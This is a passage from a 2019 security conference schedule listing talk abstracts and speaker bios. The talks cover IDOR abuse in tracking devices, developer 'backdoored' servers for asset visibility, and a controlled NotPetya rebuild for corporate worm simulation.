However, where IDOR is well known, what is not is a new technique of abusing these logic flaws for financial gain, so far unused by malicious hackers, it can easily be used to turn 20 million tracking devices in to nearly a billion dollars, all without the manufacturers and possibly the owners knowing anything about it. We will show how trivial it is to exploit and how the attack can be instigated worldwide in seconds to immediately start making money and show how the attack can be repeated time and time again with little or no repercussions.

Speakers

Tony Gee

Pen Test Partners

Tony has over 14 years of security experience, he has worked both as an internal blue team consultant within the finance industry and for the technology partner for the world leading Oyster card system and more latterly as an external security tester and auditor. Tony speaks the... Read More →

Vangelis Stykas

Pen Test Partners

Vangelis Stykas is a backend engineer turned into a pentester. Playing around with bits and bytes for the past 30 years , he has hacked ships,cars and locks. He has a weak spot for breaking APIs and web stuff but hates building them.

Friday September 13, 2019 11:00 - 11:59 BST
* Track 2 *

Track 2 Talk

12:00 BST

Lunch

Friday September 13, 2019 12:00 - 13:59 BST
1st Floor Restaurant

1st Floor Restaurant

14:00 BST

Kyle Tobener & Alessandro Lapucci - Throw Open The Gates: Trading Control for Visibility

As many enterprises shift to a cloud first business model, asset visibility can become increasingly difficult for security. Cumbersome gated approval processes, a security mainstay for years, are now quickly bypassed in the name of developer agility and growth. Security practitioners need new approaches that move at the pace of this new DevOps driven world.

In this session, we will tell the story of a simple premise: can we discard a cumbersome approval process, throw open the gates, and build visibility for security by offering free “backdoored” server resources to developers. We’ll share the context that lead to our premise, the tooling we built to facilitate the experiment, our success criteria, 3 years of practical experience running the program, and lessons learned.

Speakers

Kyle Tobener

SalesForce

Kyle Tobener is a Director of Enterprise Security at Salesforce. He began his professional career as a zoologist but fled the jungle to return to San Francisco and focus on tech. His specialty now is application security, with a side dish of 3rd party vetting and contract negotiation... Read More →

Allessandro Lapucci

Alessandro is a Lead Software/Security Engineer with Security Compliance at Salesforce, where he develops internal automation tools and customer facing web applications. Born and raised in Italy, he lived in Ireland and California before recently moving to Switzerland. When he isn’t... Read More →

Friday September 13, 2019 14:00 - 14:59 BST
* Track 1 *

Track 1 Talk

15:00 BST

Aaron Adams, Cedric Halbronn & James Fisher - EternalGlue - Rewriting NotPetya for corporate use

NCC Group had a large corporate client that was interested in how their production network would be impacted if they had been hit by the NotPetya worm. Cedric and Aaron ended up reverse engineering NotPetya and building a custom
version with all the ransomware/destructive capabilities pulled out, and plugged it inside new logic to limit how it spreads. This allowed client-defined parameters to dictate where it could propagate and also allowed infections to transmit telemetry information back to a central server to allow visibility into how and where it spread.

After providing the client with the tool they went through a three-phase approach of ensuring that the simulated worm actually behaved as expected, with the final phase being them running it within their corporate production
environment. This allowed them to observe how the real threat would’ve spread, highlighted some important mitigations already in place, as well as highlighting areas of their network they didn’t anticipate to be affected, etc.

Cedric and Aaron will discuss the work involved in reverse engineering NotPetya, the logic introduced to ensure safe and controlled propagation, some of the technical hurdles encountered, basic AV bypassing required, the lab environment used for testing, etc. James will discuss his experience from the client’s perspective and what was involved in convincing such a large organization to get on board with running such a tool in a production environment.

This opens up a new phase of development and tooling opportunity for the defense industry. It allows us to much more closely mimic realworld scenarios in a controlled fashion and allows different and arguably more realistic visibility into the effects of such realworld attacks, versus more traditional consulting approaches.

Speakers

Track 1 Talk

16:00 BST

Closing ceremony

Speakers

adrian

Steve

Friday September 13, 2019 16:00 - 16:29 BST
* Track 1 *

Track 1 Talk